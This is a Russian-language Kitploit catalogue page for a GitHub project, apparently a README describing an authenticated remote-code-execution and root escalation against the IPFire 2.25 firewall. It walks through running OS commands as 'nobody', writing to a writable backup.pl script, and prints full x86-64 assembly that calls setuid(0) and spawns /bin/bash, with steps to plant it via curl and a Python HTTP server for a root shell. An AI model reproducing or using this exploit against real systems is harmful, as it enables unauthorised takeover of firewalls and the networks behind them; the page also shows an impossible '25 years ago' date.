Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
ipfire-2-25-auth-rce — ipfire 2.25 authenticated remote code execution | Kitploit
Инструменты/GitHubGitHub/kaanaryoverflow/ipfire-2-25-auth-rce
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationPayload DevelopmentBinary Exploitation
GitHubkaanaryoverflow/ipfire-2-25-auth-rce

ipfire-2-25-auth-rce

ipfire 2.25 authenticated remote code execution

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
25 лет назадЕщё не проверено

Ipfire 2-25 (core update 156) аутентифицированное удалённое выполнение кода (RCE)

  • система выполняет команду при установке любого пакета

packfileinstallation

  • система забирает 7zip прямо из html

pocpc0

  • и проверяем каталог tmp

pocpc1

  • версия 2.25 — core update 156

version

  • ipfire позволяет выполнять произвольные команды ОС от имени nobody после входа в систему

Получаем root!

  • проверяем suid-бинарники

find-suid

  • программа резервного копирования запускает другой скрипт. /var/ipfire/backup/bin/backup.pl (это bash-скрипт, и права у него отличные)

backup-tespiti

  • пробуем записать в bash-скрипт. (Ошибок нет. ОТЛИЧНО!)

yazma-denemesi

  • пробуем запустить bash

yazabilme-kanıtı

  • да. запустить можем, но с низкими привилегиями. нужно вызвать setuid(0)!
  • сохраните это и выполните alti name.asm q
  • alti — моя собственная программа проверки компиляции из репозитория soo_deep.
root@kitploit:~
bits 64
section .data
  string db "/bin/bash",0x00
  olmadis db "basarisiz.",0x0a,0x00
  olmadil equ $-olmadis
section .text
  global main
main:
  mov rax,105
  mov rdi,0
  syscall
  cmp rax,0
  je getbash

  mov rax,1
  mov rdi,1
  mov rsi,olmadis
  mov rdx,olmadil
  syscall

  mov rax,60
  xor rdi,rdi
  syscall

getbash:
  mov rax,59
  mov rdi,string
  mov rsi,0
  mov rdx,0
  syscall
  • и записываем новую программу в /var/ipfire/backup/bin/backup.pl. (можем использовать python http server и curl для записи)

  • и наслаждаемся root-шеллом!

image

Скачать инструмент